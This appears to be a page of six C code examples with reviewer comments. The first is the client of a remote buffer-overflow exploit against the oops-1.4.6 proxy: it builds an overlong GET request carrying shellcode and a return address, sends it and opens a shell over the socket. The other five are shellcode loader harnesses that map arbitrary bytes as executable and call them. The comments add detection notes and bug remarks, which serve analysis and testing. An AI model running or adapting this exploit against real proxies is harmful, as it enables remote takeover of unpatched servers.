Exemple #1
/*
 * Client side of a remote overflow proof of concept. The banner printed
 * below names the target as the "oops-1.4.6" proxy, default port 3128.
 *
 * What reaches the wire is a single request:
 *     "GET http://p" + <buf> + " HTTP/1.0\r\n\r\n"
 * where <buf> is a run of 0xbf filler bytes (at most SZ = 0x2000 of them)
 * carrying whatever shellcode() writes plus one unsigned value at RETOFF.
 * For detection, the visible indicator is an HTTP GET to the proxy port
 * whose URL host component is abnormally long and consists largely of
 * 0xbf bytes.
 *
 * shellcode(), res(), spawned_shell(), OFFSET2, RETOFF and BUFADDR are
 * defined outside this listing; statements about them are hedged.
 *
 * ac/av: argument count and vector; av[1] is the host name, av[2] an
 * optional port.
 * NOTE(review): no return type is declared (implicit int) and no value is
 * returned at the end of the function.
 */
main(int ac, char** av){
#define SZ      0x2000
#define FIL     0xbf
        /* c and i are not used anywhere in the visible code. */
        char buf[SZ],buf2[SZ],*pc,c;
        int i,sock;
        struct sockaddr_in sin;         
        short port=3128;
        unsigned *pu;
        /* Every byte of buf becomes FIL; there is no NUL terminator yet. */
        memset(buf,FIL,SZ);
        /* Helper not shown. The strlen() on the next line implies it leaves
           a NUL-terminated string at the start of buf -- confirm. */
        shellcode(buf);
        /* Overwrite that terminator with filler so the string runs on. */
        buf[strlen(buf)]=FIL;
        /* Same sequence again, starting at OFFSET2 inside buf. */
        pc=&buf[OFFSET2];
        shellcode(pc);
        pc+=strlen(pc);
        *pc=FIL;
        /* Store BUFADDR as one unsigned at RETOFF through a cast pointer;
           the +4 below assumes a 4-byte unsigned. */
        pu=(unsigned*)&buf[RETOFF];
        *pu=BUFADDR;
        /* Terminate the string directly after the stored value. */
        buf[RETOFF+4]=0;
        /* NOTE(review): strcpy/strcat are unbounded. buf2 is SZ bytes and has
           to hold 25 bytes of framing plus buf plus the NUL; whether that
           fits depends on RETOFF, which is not visible here. */
        strcpy(buf2,"GET http://p");
        strcat(buf2,buf);
        strcat(buf2," HTTP/1.0\r\n\r\n");
        fprintf(stderr,"oops-1.4.6 remote xpl0it for 4.x by diman.\n");
        fprintf(stderr,"use for educational purpose only.\n");
        /* The argument check runs only after the request has been built.
           Every error path below exits with status 0. */
        if(ac<2) {
                fprintf(stderr,"usage: ./oopz target_host [port, def=3128]\n");
                exit(0);
        }
        pc=av[1];
        /* atoi() does no validation and its result is narrowed to short. */
        if(ac>2) port=atoi(av[2]);
        /* res() is not shown; a zero return is treated as a failed lookup. */
        if(!res(pc,&sin)) {
                fprintf(stderr,"can't resolve %s\n",pc);
                exit(0);
        }
        /* The return value of socket() is not checked. */
        sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
        sin.sin_port=htons(port);       
        if(connect(sock,(struct sockaddr*)&sin,sizeof(struct sockaddr))==-1) {
                fprintf(stderr,"can't connect %s:%d\n",pc,port);
                exit(0);
        }
        fprintf(stderr,"Connected. Sending surprise...\n");
        /* One send() of the whole request; its return value is ignored. */
        send(sock,buf2,strlen(buf2),0);
        /* Helper not shown; it is handed the connected socket. */
        spawned_shell(sock);
}
Exemple #2
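/*
 * Loader harness: map the file named by argv[1] as readable and executable,
 * report its size and how many zero bytes it holds, then call the first
 * mapped byte as a function.
 *
 * The mapped bytes run inside this process with its privileges; nothing in
 * this function confines them.
 *
 * Returns EXIT_FAILURE on a usage error, on any open/fstat/mmap failure, and
 * also if the called code ever returns.
 */
int main(int argc, char **argv) {
	int fd;
	struct stat sbuf;
	void (*shellcode)(void);
	off_t i; /* same type as st_size, so the scan cannot overflow an int */
	int z;
	unsigned char *p;

	if (argc != 2) {
		fprintf(stderr, "Usage: %s [filename]\n", argv[0]);
		return EXIT_FAILURE;
	}
	if ((fd = open(argv[1], O_RDONLY)) < 0) {
		perror("open() failed");
		return EXIT_FAILURE;
	}
	if (fstat(fd, &sbuf)) {
		perror("fstat() failed");
		close(fd); /* do not leak the descriptor on the error path */
		return EXIT_FAILURE;
	}
	/* File-backed private mapping, read + execute only (not writable). */
	if ((shellcode = mmap(NULL, sbuf.st_size, PROT_READ | PROT_EXEC,
	                      MAP_PRIVATE, fd, 0)) == MAP_FAILED) {
		perror("mmap() failed");
		close(fd);
		return EXIT_FAILURE;
	}

	/* The mapping stays valid after the descriptor is closed. */
	close(fd);

	printf("Read %d bytes of shell code. Here goes.\n", (int)sbuf.st_size);

	/* Count zero bytes in the mapped image. */
	for (i = 0, z = 0, p = (void *)shellcode; i < sbuf.st_size; i++) {
		if (p[i] == '\0')
			z++;
	}

	if (z > 0)
		printf("Shellcode contains %d zero bytes.\n", z);

	printf("~~~ Running shellcode ~~~\n");

	/* Control passes to the file's contents here. */
	shellcode();

	/* should not be reached */
	return EXIT_FAILURE;
}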
Exemple #3
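/*
 * Loader harness with two input modes:
 *   "-"        read bytes from stdin into a growing heap buffer, then copy
 *              them into an anonymous mapping;
 *   <filename> map the file directly.
 * Either way the mapping is readable, writable and executable at the same
 * time. The function reports the byte count and the number of zero bytes,
 * then calls the first mapped byte as a function.
 *
 * The loaded bytes run inside this process with its privileges; nothing in
 * this function confines them.
 *
 * Returns EXIT_FAILURE on a usage error, on any allocation, open, fstat or
 * mmap failure, and also if the called code ever returns.
 */
int main(int argc, char **argv) {
  /* Not referenced in the visible code; purpose not shown -- confirm. */
  char *stack_space[0x1000];
  int fd;
  struct stat sbuf;
  void (*shellcode)(void);
  int z, c, bufsize, numb;
  off_t i; /* same type as st_size for the file scan */
  unsigned char *p;

  if (argc != 2) {
    fprintf(stderr, "Usage: %s (<filename>|-)\n", argv[0]);
    return EXIT_FAILURE;
  }

  if (strcmp(argv[1], "-") == 0) {
    bufsize = 4096;
    p = malloc(bufsize);
    if (p == NULL) {
      perror("malloc() failed");
      return EXIT_FAILURE;
    }
    z = 0;
    numb = 0;
    while ((c = getchar()) != EOF) {
      if (numb == bufsize) {
        /* Grow through a temporary so the old block is not lost on failure. */
        unsigned char *grown = realloc(p, bufsize + 4096);
        if (grown == NULL) {
          perror("realloc() failed");
          free(p);
          return EXIT_FAILURE;
        }
        p = grown;
        bufsize += 4096;
      }
      p[numb++] = c;
      if (c == '\0') z++;
    }

    /* Empty input gives numb == 0, for which mmap() reports an error. */
    if ((shellcode = mmap(NULL, numb, PROT_READ | PROT_EXEC | PROT_WRITE,
                          MAP_ANONYMOUS | MAP_PRIVATE, -1, 0)) == MAP_FAILED) {
      perror("mmap() failed");
      free(p);
      return EXIT_FAILURE;
    }
    memcpy(shellcode, p, numb);
    free(p);
  } else {
    if ((fd = open(argv[1], O_RDONLY)) < 0) {
      perror("open() failed");
      return EXIT_FAILURE;
    }
    if (fstat(fd, &sbuf)) {
      perror("fstat() failed");
      close(fd); /* do not leak the descriptor on the error path */
      return EXIT_FAILURE;
    }
    /* Private mapping: writes go to this process's copy, not to the file. */
    if ((shellcode = mmap(NULL, sbuf.st_size, PROT_READ | PROT_EXEC | PROT_WRITE,
                          MAP_PRIVATE, fd, 0)) == MAP_FAILED) {
      perror("mmap() failed");
      close(fd);
      return EXIT_FAILURE;
    }

    /* The mapping stays valid after the descriptor is closed. */
    close(fd);
    for (i = 0, z = 0, p = (void *)shellcode; i < sbuf.st_size; i++) {
      if (p[i] == '\0') z++;
    }
    numb = sbuf.st_size;
  }

  printf("Read %d bytes of shell code. Here goes.\n", numb);
  if (z > 0) printf("Shellcode contains %d zero bytes.\n", z);
  printf("~~~ Running shellcode ~~~\n");

  /* Control passes to the loaded bytes here. */
  shellcode();

  /* should not be reached */
  return EXIT_FAILURE;
}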
Exemple #4
/*
 * Call the bytes that sc.code refers to as a function and ignore its result.
 *
 * sc: a ShellCode value; only its `code` member is read. The type is declared
 *     outside this listing -- presumably `code` points at a byte buffer,
 *     confirm against the declaration.
 *
 * Nothing here makes that memory executable or checks that it is; that is
 * left to whoever filled in sc.
 *
 * Returns EXIT_SUCCESS whenever the called code returns.
 */
int sctest(ShellCode const sc)
{
   /* Reinterpret the data pointer as an entry point with unspecified args. */
   int (*entry)() = (int (*)())sc.code;

   (void)entry();
   return EXIT_SUCCESS;
}
Exemple #5
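/*
 * Print the length of the byte string `code`, then call it as a function.
 *
 * `code` is defined outside this listing. Whether the call can succeed
 * depends on whether the memory holding it is executable, which this
 * function neither arranges nor checks.
 *
 * argc and argv are unused. Returns 0 if the called code returns.
 */
int main(int argc, char** argv) {
  /* strlen() returns size_t, so the conversion must be %zu; %d was a
     mismatched format specifier. The value is the length up to the first
     zero byte, which is not necessarily the size of the whole array. */
  printf("Shellcode size is %zu bytes\n", strlen(code));

  /* Reinterpret the data pointer as an entry point and transfer control. */
  int (*shellcode)() = (int(*)())code;
  shellcode();

  return 0;
}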
Exemple #6
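/*
 * Write the first bytes found at `shellcode` to stdout as raw bytes, then
 * call `shellcode`.
 *
 * `shellcode` is defined outside this listing; it is used here both as an
 * address to read from and as something callable.
 *
 * Returns 0 if the called code returns.
 */
int main() {
	/* A size printout was disabled in the original; sizeof(&shellcode)
	   would have been the size of a pointer, not of the payload. */
	int i;

	/* The original passed the address itself to putchar(), which takes an
	   int character value; read the byte at that address instead.
	   NOTE(review): the inclusive bound emits 257 bytes, and the payload's
	   real length is not visible here -- confirm the intended count. */
	for (i = 0; i <= 256; i++)
		putchar(((const unsigned char *)shellcode)[i]);

	shellcode();

	return 0;
}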